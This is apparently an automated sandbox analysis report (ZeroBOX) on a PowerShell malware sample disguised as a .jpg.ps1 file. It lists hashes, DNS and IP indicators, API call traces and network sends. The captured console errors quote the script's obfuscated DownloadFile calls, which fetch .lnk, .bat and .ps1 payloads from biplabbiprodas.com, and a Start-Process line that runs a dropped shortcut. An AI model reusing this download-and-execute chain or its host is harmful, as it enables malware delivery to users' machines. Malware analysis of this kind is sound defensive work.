popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

LzWZ0w70pWJ95p9s.jpg.ps1

Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 12, 2021, 5:57 p.m. July 12, 2021, 6 p.m.
Size 1.8KB
Type ASCII text, with CRLF line terminators
MD5 b519cbc7b8fc2b686b5e469d48472540
SHA256 96a7cd366f42298447cea6131e5be3ac1cd8fa96ea9545c30dea40879548ace9
CRC32 1FDFF1E2
ssdeep 48:tpK6Iuwto8nYb8o8IYb7G/oO0hWwrDHfFeJmFjbtNUCFeJmFjbtNPxcXHFeJmFj1:vos8nYbH8IYb7GQNhfrDtBjbsCBjbnxY
Yara None matched

Name Response Post-Analysis Lookup
biplabbiprodas.com
A 107.180.105.101
107.180.105.101
IP Address Status Action
107.180.105.101 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Mode LastWriteTime Length Name
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: d---- 2021-07-12 오후 5:57 Start
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\LzWZ0w70pWJ95p9s.jpg.ps1:16 char:65
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: ://biplabbiprodas.com/wp-content/themes/jackryan/languages/0vZ7eGlY1GEXVt11.lnk
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: ', $gang + 'V7NfyuADsqDqXPZ5fat.lnk')){
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x00000097
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x000000a3
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\LzWZ0w70pWJ95p9s.jpg.ps1:19 char:65
console_handle: 0x000000af
1 1 0

WriteConsoleW

 buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https
console_handle: 0x000000bb
1 1 0

WriteConsoleW

 buffer: ://biplabbiprodas.com/wp-content/themes/jackryan/languages/DEVCuDqAcg1yn0N8.jpg
console_handle: 0x000000c7
1 1 0

WriteConsoleW

 buffer: ', $florida + 'LvasylspLfIO7R5YEr0.bat')){
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000df
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000eb
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadFile" with "2" argument(s): "The underlying connecti
console_handle: 0x0000010b
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x00000117
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\LzWZ0w70pWJ95p9s.jpg.ps1:22 char:65
console_handle: 0x00000123
1 1 0

WriteConsoleW

 buffer: + if((New-Object $SystemSettingsBroker)."`D`o`w`N`l`o`A`d`F`i`l`e" <<<< ('https
console_handle: 0x0000012f
1 1 0

WriteConsoleW

 buffer: ://biplabbiprodas.com/wp-content/themes/jackryan/languages/ufatMWl1ocPLQWU5rCS.
console_handle: 0x0000013b
1 1 0

WriteConsoleW

 buffer: jpg', $drogba + 'MIfat7uauRiR3nHRG9cv.ps1')){
console_handle: 0x00000147
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000153
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000015f
1 1 0

WriteConsoleW

 buffer: Start-Process : This command cannot be executed due to the error: The system ca
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: nnot find the file specified.
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: At C:\Users\test22\AppData\Local\Temp\LzWZ0w70pWJ95p9s.jpg.ps1:24 char:6
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: + start <<<< "C:\ProgramData\Microsoft Arts\Start\V7NfyuADsqDqXPZ5fat.lnk"
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOp
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: erationException
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.C
console_handle: 0x000001c7
1 1 0

WriteConsoleW

 buffer: ommands.StartProcessCommand
console_handle: 0x000001d3
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05091678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x05091678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x050917f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05541000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05740000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02709000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ab3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05741000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06790000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06970000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06971000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06972000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06973000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06974000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06975000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06976000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0697a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0698b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0698c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0698d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05596000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05597000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05598000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2448
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x056f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\Microsoft Arts\Start\V7NfyuADsqDqXPZ5fat.lnk
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received 
Data received F
Data sent uq`ì$ðØï_=vh!¨—LÙÙzl ððŸiåáF2n·/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
Data sent uq`ì%D U9íXÿü¥Œ¢|ª<”Ž29D®‚ó/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
Data sent uq`ì&ªòpX¹J£ž3=Ð,7Ћ•,Åe™Ã¡½/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
Data sent uq`ì&«&°V†Õô7¬äӄýnnÐô>Ý;ŠZR×>ŽŒ/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
Data sent uq`ì&AänQ¬vÇÇ2Èâï+;›¬Ê®’vT¸ˆ›G/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
Data sent uq`ì'¹™!ºSóük¹ë°GIW®àzÁDÿô1@÷¶X/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
file C:\ProgramData\Microsoft Arts\Start\V7NfyuADsqDqXPZ5fat.lnk
file C:\ProgramData\Microsoft Arts\Start\V7NfyuADsqDqXPZ5fat.lnk
Time & API Arguments Status Return Repeated

send

 buffer: uq`ì$ðØï_=vh!¨—LÙÙzl ððŸiåáF2n·/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1520
sent: 122
1 122 0

send

 buffer: uq`ì%D U9íXÿü¥Œ¢|ª<”Ž29D®‚ó/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1520
sent: 122
1 122 0

send

 buffer: uq`ì&ªòpX¹J£ž3=Ð,7Ћ•,Åe™Ã¡½/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1556
sent: 122
1 122 0

send

 buffer: uq`ì&«&°V†Õô7¬äӄýnnÐô>Ý;ŠZR×>ŽŒ/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1556
sent: 122
1 122 0

send

 buffer: uq`ì&AänQ¬vÇÇ2Èâï+;›¬Ê®’vT¸ˆ›G/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1556
sent: 122
1 122 0

send

 buffer: uq`ì'¹™!ºSóük¹ë°GIW®àzÁDÿô1@÷¶X/5 ÀÀÀ À 280ÿbiplabbiprodas.com  
socket: 1556
sent: 122
1 122 0
parent_process powershell.exe martian_process C:\ProgramData\Microsoft Arts\Start\V7NfyuADsqDqXPZ5fat.lnk